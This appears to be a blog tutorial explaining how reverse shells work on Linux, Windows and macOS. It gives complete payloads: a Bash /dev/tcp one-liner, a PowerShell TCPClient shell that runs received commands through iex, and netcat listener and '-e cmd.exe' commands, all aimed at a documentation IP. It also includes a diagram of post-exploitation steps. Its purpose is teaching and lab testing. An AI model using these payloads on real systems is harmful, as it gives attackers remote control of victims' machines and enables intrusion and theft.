A reverse shell is a crafty technique hackers (and ethical testers) use to remotely control a system. Unlike a typical connection where you log into a machine, a reverse shell makes the target reach out to the attacker, handing over a command-line interface. It’s sneaky, powerful, and works across operating systems. In this post, I’ll break down how reverse shells function on Linux, Windows, and macOS, complete with examples you can test in a controlled environment (please, only on systems you own!).
What’s a Reverse Shell?
Imagine you’re a hacker who’s tricked a target into running your code. A reverse shell lets that target call you back over the network, giving you a shell—like a terminal or command prompt—to run commands remotely. It’s “reverse” because the connection starts from the victim, not the attacker. Why? Firewalls often block incoming traffic but let outgoing connections slide, making this a go-to move for bypassing defenses.
How It Works -linux
[Attacker Machine] [Target Machine]
+-------------+ +-------------+
| Start Listener | | Deliver Payload |
| (nc -lvp 4444) | | |
+-------------+ +-------------+
| |
+-------------+ +-------------+
| Craft Payload | -----> | Execute Payload |
+-------------+ +-------------+
| |
+-------------+ +-------------+
| Accept Connection | <---- | Initiate TCP |
| | (dashed) | Connection |
+-------------+ +-------------+
| |
+-------------+ +-------------+
| Interactive | <----> | Spawn Shell |
| Shell Access | (two-way) | |
+-------------+ +-------------+
|
+-------------+
| Exploit Access |
+-------------+
/ | \
Steal Escalate Install
Data Privileges MalwareLinux is a favorite for reverse shells, especially on servers. It’s packed with tools like Bash and Netcat that make the process straightforward. The attacker gets a payload onto the target (say, via a phishing email or a hacked website), runs it, and waits for the target to connect back.
The payload tells the Linux system to:
- Open a network connection to the attacker’s IP and port.
- Tie a shell (like Bash) to that connection, sending input/output over the wire.
Example
Attacker Setup: On their machine (IP: 203.0.113.5), the attacker runs:
nc -lvp 4444This starts Netcat listening on port 4444.
Target Payload: On the Linux target, the attacker executes:
bash -i >& /dev/tcp/203.0.113.5/4444 0>&1- bash -i: Starts an interactive Bash shell.
- >& /dev/tcp/203.0.113.5/4444: Redirects output to a TCP connection to the attacker’s IP and port.
- 0>&1: Loops input back through the same connection.
Result: The target connects to the attacker, and they see a Bash prompt. Typing whoami might return user123, proving they’ve got control.
Why It Works
Linux’s built-in /dev/tcp feature and common tools like Netcat make this a breeze. It’s fast, simple, and deadly effective on unsecured systems.
How It Works – windows
Windows doesn’t have Bash or /dev/tcp, but it’s still vulnerable. Attackers lean on PowerShell (built into modern Windows) or tools like Netcat if they can sneak them onto the system. The process is the same: deliver a payload, make the target connect back, and spawn a shell like cmd.exe or PowerShell.
Windows payloads tend to be wordier due to its scripting environment, but they’re just as potent.
Example
Attacker Setup: On their machine (IP: 203.0.113.5), they run:
nc -lvp 4444Target Payload: On the Windows target, the attacker runs this PowerShell command (shortened for readability):
powershell -c "$c = New-Object System.Net.Sockets.TCPClient('203.0.113.5',4444);$s = $c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r = (iex $d 2>&1 | Out-String );$sb = ([text.encoding]::ASCII).GetBytes($r+'PS> ');$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"- Creates a TCP connection to 203.0.113.5:4444.
- Sets up a stream to send/receive data.
- Executes commands (via iex) and sends results back, with a PS> prompt.
Result: The attacker gets a PowerShell session. Typing whoami might return desktop\user, showing they’re in.
Why It Works
PowerShell’s flexibility and Windows’ trust in outgoing connections make this a prime attack vector. If Netcat’s installed, an even simpler nc.exe -e cmd.exe 203.0.113.5 4444 does the trick.
How It Works – macOS
macOS, being Unix-based, is a lot like Linux under the hood. It ships with Bash (or Zsh in newer versions) and tools like Netcat, so payloads often mirror Linux ones. The attacker delivers the code, the target connects back, and a shell opens up—same game, different Apple-flavored field.
Example
Attacker Setup: On their machine (IP: 203.0.113.5), they run:
nc -lvp 4444Target Payload: On the macOS target:
bash -i >& /dev/tcp/203.0.113.5/4444 0>&1- Identical to the Linux version—Bash handles it the same way.
- Connects to the attacker and binds the shell.
Result: The attacker gets a Bash prompt. A quick whoami might return macuser, confirming access.
Why It Works
macOS inherits Unix’s networking tricks, like /dev/tcp, and its permissive outgoing traffic policies. It’s less common as a target than Linux servers or Windows PCs, but just as viable.
Key Takeaways
- Cross-Platform Threat: Reverse shells work anywhere there’s network access and a way to run code—Linux, Windows, macOS, even IoT devices.
- OS-Specific Payloads: The method stays the same, but the tools (Bash, PowerShell, etc.) change.
- Firewall Friendly: By going outbound, reverse shells dodge most basic defenses.
Stay Safe
If you’re testing this (legally, on your own systems), use a virtual machine or isolated network. In the wild, attackers hide these with encryption or persistence tricks—defend with strong monitoring and least-privilege policies.
What do you think? Ever tried setting up a reverse shell in a lab? Let me know in the comments!